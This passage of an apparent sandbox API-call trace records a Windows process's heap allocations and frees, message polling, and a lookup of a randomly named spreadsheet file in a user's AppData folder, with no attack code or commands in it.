out: hHeap=0x2af0000) returned 1 [0150.024] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0150.024] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0150.024] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0150.024] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0150.024] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0150.024] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0150.024] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0150.024] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0150.024] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0150.024] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0150.024] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fc0 [0150.024] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0150.024] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xa0) returned 0x2a68440 [0150.024] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ee0 | out: hHeap=0x2af0000) returned 1 [0150.024] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0150.025] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0150.025] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0150.025] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fc0 | out: hHeap=0x2af0000) returned 1 [0150.025] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0150.025] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0150.025] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a722f8 [0150.025] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0150.025] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72278 [0150.025] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0150.025] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0150.025] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72328 [0150.025] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0150.025] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722b8 [0150.025] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0150.025] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa92e0 [0150.025] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0150.025] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0150.025] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72368 [0150.025] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0150.025] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0150.025] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0150.025] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0150.025] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0150.025] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0150.025] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721e8 [0150.025] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0150.025] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0150.025] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0150.025] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0150.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0150.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0150.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721a8 [0150.026] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0150.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0150.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0150.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0150.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0150.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0150.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72338 [0150.026] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0150.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0150.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0150.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0150.026] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0150.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72318 [0150.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0150.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0150.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0150.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722c8 [0150.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0150.026] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0150.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72258 [0150.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0150.026] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0150.026] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cb0 | out: hHeap=0x2af0000) returned 1 [0150.026] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0150.026] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0150.026] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0150.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0150.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0150.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0150.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed40 [0150.027] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0150.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed40 | out: hHeap=0x2af0000) returned 1 [0150.027] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0150.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0150.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72388 [0150.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0150.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0150.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0150.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0150.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721f8 [0150.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0150.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0150.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72248 [0150.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0150.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0150.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0150.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0150.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0150.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0150.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0150.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72268 [0150.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0150.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0150.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72378 [0150.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0150.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0150.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0150.028] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0150.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77eb8 | out: hHeap=0x2af0000) returned 1 [0150.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0150.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0150.028] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0150.028] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0150.028] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72278 [0150.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0150.028] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0150.028] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0150.028] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0150.028] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72388 [0150.028] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0150.028] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0150.028] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72208 [0150.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0150.028] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0150.028] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0150.028] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0150.028] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722c8 [0150.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0150.028] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0150.028] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0150.028] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72318 [0150.028] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa210 [0150.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0150.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa210 | out: hHeap=0x2af0000) returned 1 [0150.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0150.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0150.029] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0150.029] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0150.029] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0150.029] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0150.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0150.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0150.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72318 [0150.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0150.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0150.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722a8 [0150.029] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0150.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0150.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0150.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0150.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72288 [0150.029] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0150.029] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0150.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0150.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0150.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0150.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0150.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0150.033] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0150.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0150.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72258 [0150.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0150.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0150.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0150.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa018 [0150.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72278 [0150.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0150.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1e0 [0150.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722b8 [0150.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1e0 | out: hHeap=0x2af0000) returned 1 [0150.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0150.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f88 [0150.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0d8 [0150.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0150.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0150.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0150.033] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0150.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0150.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72228 [0150.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0150.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0150.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0150.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0f0 [0150.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72318 [0150.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0150.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa210 [0150.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72238 [0150.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa210 | out: hHeap=0x2af0000) returned 1 [0150.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0150.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa030 [0150.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0a8 [0150.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722c8 [0150.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0150.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0150.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0c0 [0150.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0150.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fa0 [0150.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0150.034] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/s4dSYQJ4.xlsx", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fc32710, ftCreationTime.dwHighDateTime=0x1d5cd3c, ftLastAccessTime.dwLowDateTime=0x2c24e6a0, ftLastAccessTime.dwHighDateTime=0x1d5d7a1, ftLastWriteTime.dwLowDateTime=0x2c24e6a0, ftLastWriteTime.dwHighDateTime=0x1d5d7a1, nFileSizeHigh=0x0, nFileSizeLow=0x7af, dwReserved0=0x0, dwReserved1=0x0, cFileName="s4dSYQJ4.xlsx", cAlternateFileName="S4DSYQ~1.XLS")) returned 0x9e1ef8 [0150.034] FindClose (in: hFindFile=0x9e1ef8 | out: hFindFile=0x9e1ef8) returned 1 [0150.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fa0 | out: hHeap=0x2af0000) returned 1 [0150.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0c0 | out: hHeap=0x2af0000) returned 1 [0150.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0150.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0150.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0f0 | out: hHeap=0x2af0000) returned 1 [0150.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0150.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0a8 | out: hHeap=0x2af0000) returned 1 [0150.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0150.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0150.035] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0150.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa198 [0150.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722c8 [0150.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa198 | out: hHeap=0x2af0000) returned 1 [0150.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0150.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0c0 [0150.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fa0 [0150.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72348 [0150.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0150.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa180 [0150.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72318 [0150.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa180 | out: hHeap=0x2af0000) returned 1 [0150.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0150.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0f0 [0150.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa108 [0150.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0150.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0c0 | out: hHeap=0x2af0000) returned 1 [0150.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa120 [0150.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fe8 [0150.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0150.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa138 [0150.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0150.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa138 | out: hHeap=0x2af0000) returned 1 [0150.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fe8 | out: hHeap=0x2af0000) returned 1 [0150.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa120 | out: hHeap=0x2af0000) returned 1 [0150.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0150.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fa0 | out: hHeap=0x2af0000) returned 1 [0150.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 